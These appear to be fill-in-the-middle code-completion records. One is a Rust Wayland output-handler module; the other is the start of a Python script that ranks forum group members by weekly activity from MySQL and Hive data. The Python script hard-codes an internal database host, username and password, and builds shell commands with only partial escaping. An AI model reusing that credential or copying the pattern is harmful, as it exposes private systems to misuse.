OutputInfo {
id,
model: String::new(),
make: String::new(),
location: (0, 0),
physical_size: (0, 0),
subpixel: Subpixel::Unknown,
transform: Transform::Normal,
scale_factor: 1,
modes: Vec::new(),
obsolete: false,
}
}
}
type OutputCallback = dyn Fn(WlOutput, &OutputInfo, DispatchData) + Send + Sync;
enum OutputData {
Ready { info: OutputInfo, callbacks: Vec<sync::Weak<OutputCallback>> },
Pending { id: u32, events: Vec<Event>, callbacks: Vec<sync::Weak<OutputCallback>> },
}
type OutputStatusCallback = dyn FnMut(WlOutput, &OutputInfo, DispatchData) + 'static;
| /// included in [`new_default_environment!`](../macro.new_default_environment.html).
///
/// It aggregates the output information and makes it available via the
/// [`with_output_info`](fn.with_output_info.html) function.
pub struct OutputHandler {
outputs: Vec<(u32, Attached<WlOutput>)>,
status_listeners: Rc<RefCell<Vec<rc::Weak<RefCell<OutputStatusCallback>>>>>,
}
impl OutputHandler {
/// Create a new instance of this handler
pub fn new() -> OutputHandler {
OutputHandler { outputs: Vec::new(), status_listeners: Rc::new(RefCell::new(Vec::new())) }
}
}
impl crate::environment::MultiGlobalHandler<WlOutput> for OutputHandler {
fn created(
&mut self,
registry: Attached<wl_registry::WlRegistry>,
id: u32,
version: u32,
_: DispatchData,
) {
// We currently support wl_output up to version 3
let version = std::cmp::min(version, 3);
let output = registry.bind::<WlOutput>(version, id);
if version > 1 {
// wl_output.done event was only added at version 2
// In case of an old version 1, we just behave as if it was send at the start
output.as_ref().user_data().set_threadsafe(|| {
Mutex::new(OutputData::Pending { id, events: vec![], callbacks: vec![] })
});
} else {
output.as_ref().user_data().set_threadsafe(|| {
Mutex::new(OutputData::Ready { info: OutputInfo::new(id), callbacks: vec![] })
});
}
let status_listeners_handle = self.status_listeners.clone();
output.quick_assign(move |output, event, ddata| {
process_output_event(output, event, ddata, &status_listeners_handle)
});
self.outputs.push((id, (*output).clone()));
}
fn removed(&mut self, id: u32, mut ddata: DispatchData) {
let status_listeners_handle = self.status_listeners.clone();
self.outputs.retain(|(i, o)| {
if *i != id {
true
} else {
make_obsolete(o, ddata.reborrow(), &status_listeners_handle);
false
}
});
}
fn get_all(&self) -> Vec<Attached<WlOutput>> {
self.outputs.iter().map(|(_, o)| o.clone()).collect()
}
}
fn process_output_event(
output: Main<WlOutput>,
event: Event,
mut ddata: DispatchData,
listeners: &RefCell<Vec<rc::Weak<RefCell<OutputStatusCallback>>>>,
) {
let udata_mutex = output
.as_ref()
.user_data()
.get::<Mutex<OutputData>>()
.expect("SCTK: wl_output has invalid UserData");
let mut udata = udata_mutex.lock().unwrap();
if let Event::Done = event {
let (id, pending_events, mut callbacks) =
if let OutputData::Pending { id, events: ref mut v, callbacks: ref mut cb } = *udata {
(id, std::mem::replace(v, vec![]), std::mem::replace(cb, vec![]))
} else {
// a Done event on an output that is already ready => nothing to do
return;
};
let mut info = OutputInfo::new(id);
for evt in pending_events {
merge_event(&mut info, evt);
}
notify(&output, &info, ddata.reborrow(), &mut callbacks);
notify_status_listeners(&output, &info, ddata, listeners);
*udata = OutputData::Ready { info, callbacks };
} else {
match *udata {
OutputData::Pending { events: ref mut v, .. } => v.push(event),
OutputData::Ready { ref mut info, ref mut callbacks } => {
merge_event(info, event);
notify(&output, info, ddata, callbacks);
}
}
}
}
fn make_obsolete(
output: &Attached<WlOutput>,
mut ddata: DispatchData,
listeners: &RefCell<Vec<rc::Weak<RefCell<OutputStatusCallback>>>>,
) {
let udata_mutex = output
.as_ref()
.user_data()
.get::<Mutex<OutputData>>()
.expect("SCTK: wl_output has invalid UserData");
let mut udata = udata_mutex.lock().unwrap();
let (id, mut callbacks) = match *udata {
OutputData::Ready { ref mut info, ref mut callbacks } => {
info.obsolete = true;
notify(output, info, ddata.reborrow(), callbacks);
notify_status_listeners(&output, info, ddata, listeners);
return;
}
OutputData::Pending { id, callbacks: ref mut cb, .. } => {
(id, std::mem::replace(cb, vec![]))
}
};
let mut info = OutputInfo::new(id);
info.obsolete = true;
notify(output, &info, ddata.reborrow(), &mut callbacks);
notify_status_listeners(&output, &info, ddata, listeners);
*udata = OutputData::Ready { info, callbacks };
}
fn merge_event(info: &mut OutputInfo, event: Event) {
match event {
Event::Geometry {
x,
y,
physical_width,
physical_height,
subpixel,
model,
make,
transform,
} => {
info.location = (x, y);
info.physical_size = (physical_width, physical_height);
info.subpixel = subpixel;
info.transform = transform;
info.model = model;
info.make = make;
}
Event::Scale { factor } => {
info.scale_factor = factor;
}
Event::Mode { width, height, refresh, flags } => {
let mut found = false;
if let Some(mode) = info
.modes
.iter_mut()
.find(|m| m.dimensions == (width, height) && m.refresh_rate == refresh)
{
// this mode already exists, update it
mode.is_preferred = flags.contains(wl_output::Mode::Preferred);
mode.is_current = flags.contains(wl_output::Mode::Current);
found = true;
}
if !found {
// otherwise, add it
info.modes.push(Mode {
dimensions: (width, height),
refresh_rate: refresh,
is_preferred: flags.contains(wl_output::Mode::Preferred),
is_current: flags.contains(wl_output::Mode::Current),
})
}
}
// ignore all other events
_ => (),
}
}
fn notify(
output: &WlOutput,
info: &OutputInfo,
mut ddata: DispatchData,
callbacks: &mut Vec<sync::Weak<OutputCallback>>,
) {
callbacks.retain(|weak| {
if let Some(arc) = sync::Weak::upgrade(weak) {
(*arc)(output.clone(), info, ddata.reborrow());
true
} else {
false
}
});
}
fn notify_status_listeners(
output: &Attached<WlOutput>,
info: &OutputInfo,
mut ddata: DispatchData,
listeners: &RefCell<Vec<rc::Weak<RefCell<OutputStatusCallback>>>>,
) {
// Notify the callbacks listening for new outputs
listeners.borrow_mut().retain(|lst| {
if let Some(cb) = rc::Weak::upgrade(lst) {
(&mut *cb.borrow_mut())(output.detach(), info, ddata.reborrow());
true
} else {
false
}
})
}
/// Access the info associated with this output
///
/// The provided closure is given the [`OutputInfo`](struct.OutputInfo.html) as argument,
/// and its return value is returned from this function.
///
/// If the provided `WlOutput` has not yet been initialized or is not managed by SCTK, `None` is returned.
///
/// If the output has been removed by the compositor, the `obsolete` field of the `OutputInfo`
/// will be set to `true`. This handler will not automatically detroy the output by calling its
/// `release` method, to avoid interfering with your logic.
pub fn with_output_info<T, F: FnOnce(&OutputInfo) -> T>(output: &WlOutput, f: F) -> Option<T> {
if let Some(ref udata_mutex) = output.as_ref().user_data().get::<Mutex<OutputData>>() {
let udata = udata_mutex.lock().unwrap();
match *udata {
OutputData::Ready { ref info, .. } => Some(f(info)),
OutputData::Pending { .. } => None,
}
} else {
None
}
}
/// Add a listener to this output
///
/// The provided closure will be called whenever a property of the output changes,
/// including when it is removed by the compositor (in this case it'll be marked as
/// obsolete).
///
/// The returned [`OutputListener`](struct.OutputListener) keeps your callback alive,
/// dropping it will disable the callback and free the closure.
pub fn add_output_listener<F: Fn(WlOutput, &OutputInfo, DispatchData) + Send + Sync + 'static>(
output: &WlOutput,
f: F,
) -> OutputListener {
let arc = Arc::new(f) as Arc<_>;
if let Some(udata_mutex) = output.as_ref().user_data().get::<Mutex<OutputData>>() {
let mut udata = udata_mutex.lock().unwrap();
match *udata {
OutputData::Pending { ref mut callbacks, .. } => {
callbacks.push(Arc::downgrade(&arc));
}
OutputData::Ready { ref mut callbacks, .. } => {
callbacks.push(Arc::downgrade(&arc));
}
}
}
OutputListener { _cb: arc }
}
/// A handle to an output listener callback
///
/// Dropping it disables the associated callback and frees the closure.
pub struct OutputListener {
_cb: Arc<dyn Fn(WlOutput, &OutputInfo, DispatchData) + Send + Sync + 'static>,
}
/// A handle to an output status callback
///
/// Dropping it disables the associated callback and frees the closure.
pub struct OutputStatusListener {
_cb: Rc<RefCell<OutputStatusCallback>>,
}
/// Trait representing the OutputHandler functions
///
/// Implementing this trait on your inner environment struct used with the
/// [`environment!`](../macro.environment.html) by delegating it to its
/// [`OutputHandler`](struct.OutputHandler.html) field will make available the output-associated
/// method on your [`Environment`](../environment/struct.Environment.html).
pub trait OutputHandling {
/// Insert a listener for output creation and removal events
fn listen<F: FnMut(WlOutput, &OutputInfo, DispatchData) + 'static>(
&mut self,
f: F,
) -> OutputStatusListener;
}
impl OutputHandling for OutputHandler {
fn listen<F: FnMut(WlOutput, &OutputInfo, DispatchData) + 'static>(
&mut self,
f: F,
) -> OutputStatusListener {
let rc = Rc::new(RefCell::new(f)) as Rc<_>;
self.status_listeners.borrow_mut().push(Rc::downgrade(&rc));
OutputStatusListener { _cb: rc }
}
}
impl<E: OutputHandling> crate::environment::Environment<E> {
/// Insert a new listener for outputs
///
/// The provided closure will be invoked whenever a `wl_output` is created or removed.
///
/// Note that if outputs already exist when this callback is setup, it'll not be invoked on them.
/// For you to be notified of them as well, you need to first process them manually by calling
/// `.get_all_outputs()`.
///
/// The returned [`OutputStatusListener`](../output/struct.OutputStatusListener.hmtl) keeps your
/// callback alive, dropping it will disable it.
#[must_use = "the returned OutputStatusListener keeps your callback alive, dropping it will disable it"]
pub fn listen_for_outputs<F: FnMut(WlOutput, &OutputInfo, DispatchData) + 'static>(
&self,
f: F,
) -> OutputStatusListener {
self.with_inner(move |inner| OutputHandling::listen(inner, f))
}
}
impl<E: crate::environment::MultiGlobalHandler<WlOutput>> crate::environment::Environment<E> {
/// Shorthand method to retrieve the list of outputs
pub fn get_all_outputs(&self) -> Vec<WlOutput> {
self.get_all_globals::<WlOutput>().into_iter().map(|o| o.detach()).collect()
}
} | /// A handler for `wl_output`
///
/// This handler can be used for managing `wl_output` in the
/// [`init_environment!`](../macro.init_environment.html) macro, and is automatically | random_line_split |
output.rs | //! Types and functions related to graphical outputs
//!
//! This modules provides two main elements. The first is the
//! [`OutputHandler`](struct.OutputHandler.html) type, which is a
//! [`MultiGlobalHandler`](../environment/trait.MultiGlobalHandler.html) for
//! use with the [`init_environment!`](../macro.init_environment.html) macro. It is automatically
//! included if you use the [`new_default_environment!`](../macro.new_default_environment.html).
//!
//! The second is the [`with_output_info`](fn.with_output_info.html) with allows you to
//! access the information associated to this output, as an [`OutputInfo`](struct.OutputInfo.html).
use std::{
cell::RefCell,
rc::{self, Rc},
sync::{self, Arc, Mutex},
};
use wayland_client::{
protocol::{
wl_output::{self, Event, WlOutput},
wl_registry,
},
Attached, DispatchData, Main,
};
pub use wayland_client::protocol::wl_output::{Subpixel, Transform};
/// A possible mode for an output
#[derive(Copy, Clone, Debug)]
pub struct Mode {
/// Number of pixels of this mode in format `(width, height)`
///
/// for example `(1920, 1080)`
pub dimensions: (i32, i32),
/// Refresh rate for this mode, in mHz
pub refresh_rate: i32,
/// Whether this is the current mode for this output
pub is_current: bool,
/// Whether this is the preferred mode for this output
pub is_preferred: bool,
}
#[derive(Clone, Debug)]
/// Compiled information about an output
pub struct OutputInfo {
/// The ID of this output as a global
pub id: u32,
/// The model name of this output as advertised by the server
pub model: String,
/// The make name of this output as advertised by the server
pub make: String,
/// Location of the top-left corner of this output in compositor
/// space
///
/// Note that the compositor may decide to always report (0,0) if
/// it decides clients are not allowed to know this information.
pub location: (i32, i32),
/// Physical dimensions of this output, in unspecified units
pub physical_size: (i32, i32),
/// The subpixel layout for this output
pub subpixel: Subpixel,
/// The current transformation applied to this output
///
/// You can pre-render your buffers taking this information
/// into account and advertising it via `wl_buffer.set_tranform`
/// for better performances.
pub transform: Transform,
/// The scaling factor of this output
///
/// Any buffer whose scaling factor does not match the one
/// of the output it is displayed on will be rescaled accordingly.
///
/// For example, a buffer of scaling factor 1 will be doubled in
/// size if the output scaling factor is 2.
pub scale_factor: i32,
/// Possible modes for an output
pub modes: Vec<Mode>,
/// Has this output been unadvertized by the registry
///
/// If this is the case, it has become inert, you might want to
/// call its `release()` method if you don't plan to use it any
/// longer.
pub obsolete: bool,
}
impl OutputInfo {
fn new(id: u32) -> OutputInfo {
OutputInfo {
id,
model: String::new(),
make: String::new(),
location: (0, 0),
physical_size: (0, 0),
subpixel: Subpixel::Unknown,
transform: Transform::Normal,
scale_factor: 1,
modes: Vec::new(),
obsolete: false,
}
}
}
type OutputCallback = dyn Fn(WlOutput, &OutputInfo, DispatchData) + Send + Sync;
enum OutputData {
Ready { info: OutputInfo, callbacks: Vec<sync::Weak<OutputCallback>> },
Pending { id: u32, events: Vec<Event>, callbacks: Vec<sync::Weak<OutputCallback>> },
}
type OutputStatusCallback = dyn FnMut(WlOutput, &OutputInfo, DispatchData) + 'static;
/// A handler for `wl_output`
///
/// This handler can be used for managing `wl_output` in the
/// [`init_environment!`](../macro.init_environment.html) macro, and is automatically
/// included in [`new_default_environment!`](../macro.new_default_environment.html).
///
/// It aggregates the output information and makes it available via the
/// [`with_output_info`](fn.with_output_info.html) function.
pub struct OutputHandler {
outputs: Vec<(u32, Attached<WlOutput>)>,
status_listeners: Rc<RefCell<Vec<rc::Weak<RefCell<OutputStatusCallback>>>>>,
}
impl OutputHandler {
/// Create a new instance of this handler
pub fn new() -> OutputHandler {
OutputHandler { outputs: Vec::new(), status_listeners: Rc::new(RefCell::new(Vec::new())) }
}
}
impl crate::environment::MultiGlobalHandler<WlOutput> for OutputHandler {
fn created(
&mut self,
registry: Attached<wl_registry::WlRegistry>,
id: u32,
version: u32,
_: DispatchData,
) {
// We currently support wl_output up to version 3
let version = std::cmp::min(version, 3);
let output = registry.bind::<WlOutput>(version, id);
if version > 1 {
// wl_output.done event was only added at version 2
// In case of an old version 1, we just behave as if it was send at the start
output.as_ref().user_data().set_threadsafe(|| {
Mutex::new(OutputData::Pending { id, events: vec![], callbacks: vec![] })
});
} else {
output.as_ref().user_data().set_threadsafe(|| {
Mutex::new(OutputData::Ready { info: OutputInfo::new(id), callbacks: vec![] })
});
}
let status_listeners_handle = self.status_listeners.clone();
output.quick_assign(move |output, event, ddata| {
process_output_event(output, event, ddata, &status_listeners_handle)
});
self.outputs.push((id, (*output).clone()));
}
fn removed(&mut self, id: u32, mut ddata: DispatchData) {
let status_listeners_handle = self.status_listeners.clone();
self.outputs.retain(|(i, o)| {
if *i != id {
true
} else {
make_obsolete(o, ddata.reborrow(), &status_listeners_handle);
false
}
});
}
fn get_all(&self) -> Vec<Attached<WlOutput>> {
self.outputs.iter().map(|(_, o)| o.clone()).collect()
}
}
fn process_output_event(
output: Main<WlOutput>,
event: Event,
mut ddata: DispatchData,
listeners: &RefCell<Vec<rc::Weak<RefCell<OutputStatusCallback>>>>,
) {
let udata_mutex = output
.as_ref()
.user_data()
.get::<Mutex<OutputData>>()
.expect("SCTK: wl_output has invalid UserData");
let mut udata = udata_mutex.lock().unwrap();
if let Event::Done = event {
let (id, pending_events, mut callbacks) =
if let OutputData::Pending { id, events: ref mut v, callbacks: ref mut cb } = *udata {
(id, std::mem::replace(v, vec![]), std::mem::replace(cb, vec![]))
} else {
// a Done event on an output that is already ready => nothing to do
return;
};
let mut info = OutputInfo::new(id);
for evt in pending_events {
merge_event(&mut info, evt);
}
notify(&output, &info, ddata.reborrow(), &mut callbacks);
notify_status_listeners(&output, &info, ddata, listeners);
*udata = OutputData::Ready { info, callbacks };
} else {
match *udata {
OutputData::Pending { events: ref mut v, .. } => v.push(event),
OutputData::Ready { ref mut info, ref mut callbacks } => {
merge_event(info, event);
notify(&output, info, ddata, callbacks);
}
}
}
}
fn make_obsolete(
output: &Attached<WlOutput>,
mut ddata: DispatchData,
listeners: &RefCell<Vec<rc::Weak<RefCell<OutputStatusCallback>>>>,
) {
let udata_mutex = output
.as_ref()
.user_data()
.get::<Mutex<OutputData>>()
.expect("SCTK: wl_output has invalid UserData");
let mut udata = udata_mutex.lock().unwrap();
let (id, mut callbacks) = match *udata {
OutputData::Ready { ref mut info, ref mut callbacks } => {
info.obsolete = true;
notify(output, info, ddata.reborrow(), callbacks);
notify_status_listeners(&output, info, ddata, listeners);
return;
}
OutputData::Pending { id, callbacks: ref mut cb, .. } => {
(id, std::mem::replace(cb, vec![]))
}
};
let mut info = OutputInfo::new(id);
info.obsolete = true;
notify(output, &info, ddata.reborrow(), &mut callbacks);
notify_status_listeners(&output, &info, ddata, listeners);
*udata = OutputData::Ready { info, callbacks };
}
fn merge_event(info: &mut OutputInfo, event: Event) {
match event {
Event::Geometry {
x,
y,
physical_width,
physical_height,
subpixel,
model,
make,
transform,
} => {
info.location = (x, y);
info.physical_size = (physical_width, physical_height);
info.subpixel = subpixel;
info.transform = transform;
info.model = model;
info.make = make;
}
Event::Scale { factor } => {
info.scale_factor = factor;
}
Event::Mode { width, height, refresh, flags } => {
let mut found = false;
if let Some(mode) = info
.modes
.iter_mut()
.find(|m| m.dimensions == (width, height) && m.refresh_rate == refresh)
{
// this mode already exists, update it
mode.is_preferred = flags.contains(wl_output::Mode::Preferred);
mode.is_current = flags.contains(wl_output::Mode::Current);
found = true;
}
if !found {
// otherwise, add it
info.modes.push(Mode {
dimensions: (width, height),
refresh_rate: refresh,
is_preferred: flags.contains(wl_output::Mode::Preferred),
is_current: flags.contains(wl_output::Mode::Current),
})
}
}
// ignore all other events
_ => (),
}
}
fn notify(
output: &WlOutput,
info: &OutputInfo,
mut ddata: DispatchData,
callbacks: &mut Vec<sync::Weak<OutputCallback>>,
) {
callbacks.retain(|weak| {
if let Some(arc) = sync::Weak::upgrade(weak) {
(*arc)(output.clone(), info, ddata.reborrow());
true
} else |
});
}
fn notify_status_listeners(
output: &Attached<WlOutput>,
info: &OutputInfo,
mut ddata: DispatchData,
listeners: &RefCell<Vec<rc::Weak<RefCell<OutputStatusCallback>>>>,
) {
// Notify the callbacks listening for new outputs
listeners.borrow_mut().retain(|lst| {
if let Some(cb) = rc::Weak::upgrade(lst) {
(&mut *cb.borrow_mut())(output.detach(), info, ddata.reborrow());
true
} else {
false
}
})
}
/// Access the info associated with this output
///
/// The provided closure is given the [`OutputInfo`](struct.OutputInfo.html) as argument,
/// and its return value is returned from this function.
///
/// If the provided `WlOutput` has not yet been initialized or is not managed by SCTK, `None` is returned.
///
/// If the output has been removed by the compositor, the `obsolete` field of the `OutputInfo`
/// will be set to `true`. This handler will not automatically detroy the output by calling its
/// `release` method, to avoid interfering with your logic.
pub fn with_output_info<T, F: FnOnce(&OutputInfo) -> T>(output: &WlOutput, f: F) -> Option<T> {
if let Some(ref udata_mutex) = output.as_ref().user_data().get::<Mutex<OutputData>>() {
let udata = udata_mutex.lock().unwrap();
match *udata {
OutputData::Ready { ref info, .. } => Some(f(info)),
OutputData::Pending { .. } => None,
}
} else {
None
}
}
/// Add a listener to this output
///
/// The provided closure will be called whenever a property of the output changes,
/// including when it is removed by the compositor (in this case it'll be marked as
/// obsolete).
///
/// The returned [`OutputListener`](struct.OutputListener) keeps your callback alive,
/// dropping it will disable the callback and free the closure.
pub fn add_output_listener<F: Fn(WlOutput, &OutputInfo, DispatchData) + Send + Sync + 'static>(
output: &WlOutput,
f: F,
) -> OutputListener {
let arc = Arc::new(f) as Arc<_>;
if let Some(udata_mutex) = output.as_ref().user_data().get::<Mutex<OutputData>>() {
let mut udata = udata_mutex.lock().unwrap();
match *udata {
OutputData::Pending { ref mut callbacks, .. } => {
callbacks.push(Arc::downgrade(&arc));
}
OutputData::Ready { ref mut callbacks, .. } => {
callbacks.push(Arc::downgrade(&arc));
}
}
}
OutputListener { _cb: arc }
}
/// A handle to an output listener callback
///
/// Dropping it disables the associated callback and frees the closure.
pub struct OutputListener {
_cb: Arc<dyn Fn(WlOutput, &OutputInfo, DispatchData) + Send + Sync + 'static>,
}
/// A handle to an output status callback
///
/// Dropping it disables the associated callback and frees the closure.
pub struct OutputStatusListener {
_cb: Rc<RefCell<OutputStatusCallback>>,
}
/// Trait representing the OutputHandler functions
///
/// Implementing this trait on your inner environment struct used with the
/// [`environment!`](../macro.environment.html) by delegating it to its
/// [`OutputHandler`](struct.OutputHandler.html) field will make available the output-associated
/// method on your [`Environment`](../environment/struct.Environment.html).
pub trait OutputHandling {
/// Insert a listener for output creation and removal events
fn listen<F: FnMut(WlOutput, &OutputInfo, DispatchData) + 'static>(
&mut self,
f: F,
) -> OutputStatusListener;
}
impl OutputHandling for OutputHandler {
fn listen<F: FnMut(WlOutput, &OutputInfo, DispatchData) + 'static>(
&mut self,
f: F,
) -> OutputStatusListener {
let rc = Rc::new(RefCell::new(f)) as Rc<_>;
self.status_listeners.borrow_mut().push(Rc::downgrade(&rc));
OutputStatusListener { _cb: rc }
}
}
impl<E: OutputHandling> crate::environment::Environment<E> {
/// Insert a new listener for outputs
///
/// The provided closure will be invoked whenever a `wl_output` is created or removed.
///
/// Note that if outputs already exist when this callback is setup, it'll not be invoked on them.
/// For you to be notified of them as well, you need to first process them manually by calling
/// `.get_all_outputs()`.
///
/// The returned [`OutputStatusListener`](../output/struct.OutputStatusListener.hmtl) keeps your
/// callback alive, dropping it will disable it.
#[must_use = "the returned OutputStatusListener keeps your callback alive, dropping it will disable it"]
pub fn listen_for_outputs<F: FnMut(WlOutput, &OutputInfo, DispatchData) + 'static>(
&self,
f: F,
) -> OutputStatusListener {
self.with_inner(move |inner| OutputHandling::listen(inner, f))
}
}
impl<E: crate::environment::MultiGlobalHandler<WlOutput>> crate::environment::Environment<E> {
/// Shorthand method to retrieve the list of outputs
pub fn get_all_outputs(&self) -> Vec<WlOutput> {
self.get_all_globals::<WlOutput>().into_iter().map(|o| o.detach()).collect()
}
}
| {
false
} | conditional_block |
memberweekactrank.py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
import sys, os, datetime, time
import logging
from optparse import OptionParser
import string, codecs
import subprocess
import MySQLdb
import json, phpserialize
import httplib, urllib, socket
from urlparse import urlparse
import re
def mklogfile(s):
if not os.path.exists(s):
f=open(s,'w')
f.write('.log\n')
f.close()
os.chmod(s, 0666)
def isdate(s):
try:
time.strptime(str(s).replace('-',''),'%Y%m%d')
return True
except:
return False
def isnum(s):
ret = re.match(r'[+-]?\d*[\.]?\d*$', s)
return True if ret!=None else False
def getweekfirstday(dt):
try:
return dt + datetime.timedelta(days=1-dt.isoweekday())
except:
return None
def getweeklastday(dt):
try:
return dt + datetime.timedelta(days=7-dt.isoweekday())
except:
return None
def isweekend(s):
try:
return datetime.datetime.strptime(s,'%Y%m%d').isoweekday() == 7
except:
return False
def ismonthend(s):
try:
return (datetime.datetime.strptime(s,'%Y%m%d') + datetime.timedelta(days=1)).day == 1
except:
return False
def delbom(s):
if s[0]==codecs.BOM_UTF8:
return s[1:]
else:
return s
def delctrlchr(s, cc = '\n\t\r'):
return str(s).translate(string.maketrans(cc,' '*len(cc)))
def sqlEscape(s):
try:
ret = str(s).replace('\\','\\\\')
ret = ret.replace('`','\\`')
return ret
except:
return None
def | (s):
logger.debug("sql# %s" % s)
cmd = 'hive -S -e "%(sql)s"' % {'sql':sqlEscape(s)}
proc = subprocess.Popen(cmd, shell=True, env=os.environ, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
hiveout, errmsg = proc.communicate()
retval = proc.wait()
if retval!=0:
logger.error("HiveError!!!(%d)" % retval)
logger.error("Debug Info: %s" % str(errmsg))
sys.exit(retval)
return hiveout
def getscore(t):
return int(t.get('topicnum',0)*WEIGHTS[c_topicnum][c_default] + \
t.get('commentnum',0)*WEIGHTS[c_commentnum][c_default] + \
t.get('startopicnum',0)*WEIGHTS[c_startopicnum][c_default] + \
t.get('isnewuser',0)*WEIGHTS[c_isnewuser][c_default]
)
reload(sys)
sys.setdefaultencoding('utf8')
retval = 0
##运行时变量
pid = os.getpid()
rundate = datetime.date.today().strftime("%Y%m%d")
rundir = os.path.dirname(os.path.abspath(__file__))
runfilename = os.path.splitext(os.path.split(os.path.abspath(__file__))[1])[0]
logdir = rundir + '/log'
tmpdir = rundir + '/tmp'
if not os.path.exists(logdir):
os.mkdir(logdir,0777)
if not os.path.exists(tmpdir):
os.mkdir(tmpdir,0777)
logfile = '%(dir)s%(sep)s%(filename)s.log' % {'dir':logdir,'sep':os.sep,'filename':runfilename,'rundate':rundate,'pid':pid}
if not os.path.exists(logfile):
mklogfile(logfile)
##日志器
logger = logging.getLogger('task')
logger.setLevel(logging.DEBUG)
fileHandler = logging.FileHandler(logfile)
fileHandler.setLevel(logging.INFO)
fileHandler.setFormatter(logging.Formatter("%(asctime)s\tpid#%(process)d\t%(levelname)s - %(message)s"))
logger.addHandler(fileHandler)
consoleHandler = logging.StreamHandler()
consoleHandler.setLevel(logging.INFO)
consoleHandler.setFormatter(logging.Formatter("%(asctime)s\tpid#%(process)d\t%(filename)s\n%(message)s"))
logger.addHandler(consoleHandler)
logger.info("begin execute... %s" % str(sys.argv))
##参数解析
usageinfo = "%prog [--date=statisdate] [--post] [-v]"
parser = OptionParser(usage=usageinfo, version="%prog v0.1.0")
parser.set_defaults(statisdate=(datetime.datetime.strptime(rundate,'%Y%m%d')+datetime.timedelta(days=-1)).strftime('%Y%m%d'))
parser.add_option('-d', '--date', dest='statisdate', help='statis date, yyyy-mm-dd or yyyymmdd', metavar='DATE')
parser.add_option('-p', '--post', action='store_true', dest='postmode', default=False, help='post mode', metavar='MODE')
parser.add_option('-v', '--verbose', action='store_true', dest='verbosemode', default=False, help='verbose mode', metavar='MODE')
(options, args) = parser.parse_args()
statisdate = options.statisdate.replace('-','')
postmode = options.postmode
verbosemode = options.verbosemode
#参数检查
if verbosemode:
consoleHandler.setLevel(logging.DEBUG)
if not isdate(statisdate):
logger.error("unconverted date %s" % statisdate)
sys.exit(-101)
#日期变量
dt_statisdate = datetime.datetime.strptime(statisdate,'%Y%m%d')
statis_date = dt_statisdate.strftime('%Y-%m-%d')
statis_week = getweekfirstday(dt_statisdate).strftime('%Y-%W')
statisweek_firstday = getweekfirstday(dt_statisdate).strftime('%Y-%m-%d')
statisweek_lastday = getweeklastday(dt_statisdate).strftime('%Y-%m-%d')
preday90_date = (dt_statisdate+datetime.timedelta(days=-90)).strftime("%Y-%m-%d")
#指标权重系数配置
c_topicnum, c_commentnum, c_startopicnum, c_isnewuser = range(4)
INDEX_FACTOR = [2.0, 1.0, 0.5, 50.0]
c_default, c_app, c_web = range(3)
SOURCE_FACTOR = [1.0, 1.2, 0.8]
WEIGHTS = []
for index in INDEX_FACTOR:
row = []
for source in SOURCE_FACTOR:
row.append(index*source)
WEIGHTS.append(row)
resultset = {}
#数据来源
logger.debug("connecting mysql ...")
dbconn = MySQLdb.connect(host='10.0.10.85',user='bi',passwd='bi_haodou',port=3306,charset='utf8')
sqlcursor = dbconn.cursor()
#获取小组管理员。小组管理员不纳入小组成员排名
sqlstmt = r"""
select GroupAdmins as admin1, ManageMaster as admin2, ManageSlave as admin3
from haodou_center.GroupCate
where parentid!=0
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
ignoreusers = []
for (admin1, admin2, admin3) in dataset:
if admin1 is not None:
admin = phpserialize.loads(admin1.encode('utf-8'))
for item in admin:
if int(item) not in ignoreusers:
ignoreusers.append(int(item))
if admin2 is not None:
admin = phpserialize.loads(admin2.encode('utf-8'))
for item in admin:
if int(item) not in ignoreusers:
ignoreusers.append(int(item))
if admin3 is not None:
admin = phpserialize.loads(admin3.encode('utf-8'))
for item in admin:
if int(item) not in ignoreusers:
ignoreusers.append(int(item))
logger.debug("ignoreusers: %s" % ignoreusers)
#获取新用户。3个月内注册
sqlstmt = r"""
select userid
from haodou_passport.User
where status=1 and regtime>'%(preday90_date)s 00:00:00'
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday, \
'preday90_date':preday90_date \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
newusers = []
for row in dataset:
newusers.append(row[0])
#计算回复指标
sqlstmt = r"""
select ut.userid as userid,
count(uc.commentid) as commentnum,
count(case when uc.sourceid=0 then uc.commentid end) as commentnum_web,
count(case when uc.sourceid in (1,2) then uc.commentid end) as commentnum_app
from
(select commentid, userid, itemid as topicid, Platform as sourceid
from haodou_comment.Comment
where createtime between '%(statisweek_firstday)s 00:00:00' and '%(statisweek_lastday)s 23:59:59'
and type = '6' and status = '1'
) uc,
haodou_center.GroupTopic ut
where uc.topicid=ut.topicid
group by ut.userid
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
for (userid, commentnum, commentnum_web, commentnum_app) in dataset:
if userid in ignoreusers:
continue
if userid not in resultset:
resultset[userid] = {}
resultset[userid]['statis_date'] = statis_date
resultset[userid]['userid'] = int(userid)
resultset[userid]['commentnum'] = int(commentnum)
resultset[userid]['commentnum_web'] = int(commentnum_web)
resultset[userid]['commentnum_app'] = int(commentnum_app)
resultset[userid]['isnewuser'] = 1 if userid in newusers else 0
#计算话题指标
sqlstmt = r"""
select
userid,
count(topicid) as topicnum,
count(case when digest=1 or recommend=1 then topicid end) as startopicnum
from haodou_center.GroupTopic
where createtime between '%(statisweek_firstday)s 00:00:00' and '%(statisweek_lastday)s 23:59:59'
and status='1'
group by userid
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
